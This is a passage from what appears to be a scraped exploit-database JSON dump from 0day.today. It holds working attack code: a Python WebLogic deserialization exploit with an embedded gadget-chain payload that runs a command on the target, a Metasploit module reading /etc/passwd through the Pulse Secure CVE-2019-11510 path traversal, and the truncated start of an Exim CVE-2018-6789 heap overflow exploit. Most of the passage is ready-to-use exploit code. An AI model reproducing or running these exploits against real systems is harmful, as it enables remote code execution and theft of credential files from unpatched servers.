\"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\"\r\n \r\n \r\nchunk3 = '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\r\n \r\ntotallength = len(chunk1) + len(chunk2) + len(chunk3)\r\nprint \"[+]TOTAL payload length: \", totallength\r\n \r\n#Update the TOTAL payload length in Chunk1\r\nlen_hex = hex(totallength)\r\nprint \"[+]Payload length in HEX: \", len_hex\r\nlen_hex = len_hex.replace('0x', '0')\r\nprint \"[+]Payload length in HEX: \" , len_hex\r\n \r\ns1 = len_hex[:2]\r\ns2 = len_hex[2:4]\r\nlen_hex = unhexlify(s1 + s2)\r\n \r\nprint \"[+]Payload length in HEX now: \", len_hex\r\n \r\n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2)\r\nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\"\r\n \r\nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n#print \"[+]Updated 'chunk1' : \\n\", chunk1\r\n \r\n#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1'\r\npayload = chunk1 + chunk2 + chunk3\r\n \r\n#Adjust header for appropriate message length\r\npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\r\nprint '[+]Sending payload...'\r\nsock.send(payload)\r\n \r\nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\"\r\nprint(\"\\n[+]Response to Request#: \\n\")\r\nresponse = sock.recv(15000)\r\nprint(response)\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28661", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-12-04T20:01:09", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2019-08-21T00:00:00", "type": "zdt", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "1337DAY-ID-33140", "href": "https://0day.today/exploit/description/33140", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend\n\n# 0day.today [2019-12-04] #", "sourceHref": "https://0day.today/exploit/33140", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T17:21:06", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "zdt", "title": "Exim base64d Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789"], "modified": "2021-06-03T00:00:00", "id": "1337DAY-ID-36350", "href": "https://0day.today/exploit/description/36350", "sourceData": "#!/usr/bin/python\nimport sys\nimport time\nimport socket\nimport struct\n\ns = None\nf = None\n\ndef logo():\n print\n print \" CVE-2018-6789 Poc Exploit\"\n print \"@straight_blast ; [email\u00a0protected]\"\n print\n\n\ndef connect(host, port):\n global s\n global f\n s = socket.create_connection((host,port))\n f = s.makefile('rw', bufsize=0)\n\ndef p(v):\n return struct.pack(\"<Q\", v)\n\ndef readuntil(delim='\\n', debug = False):\n data = ''\n while not data.endswith(delim):\n data += f.read(1)\n if debug:\n print data\n return data\n\ndef write(data):\n f.write(data + \"\\n\")\n\ndef ehlo(v):\n write(\"EHLO \" + v)\n readuntil('HELP')\n\ndef unrec(v):\n write(v)\n readuntil('command')\n\ndef auth_plain(v,s = None):\n encode = v.encode('base64').replace('\\n','').replace('=','')\n if s and len(s) > 0:\n encode = encode + s\n write(\"AUTH PLAIN \" + encode)\n readuntil('data') \n\ndef one_byte_overwrite():\n v = \"C\" * 8200\n encode = v.encode('base64').replace('\\n','').replace('=','')\n encode = encode[:-1] + \"PE\"\n write(\"AUTH PLAIN \" + encode)\n readuntil('data')\n\ndef exploit(remote_host, remote_port, local_host, local_port):\n\n connect(remote_host, remote_port)\n\n print \"[0] connected to target -> \" + remote_host + \":\" + str(remote_port)\n\n time.sleep(0.5)\n \n ehlo(\"A\" * 8000) \n \n ehlo(\"B\" * 16)\n\n print \"[1] finished grooming heap 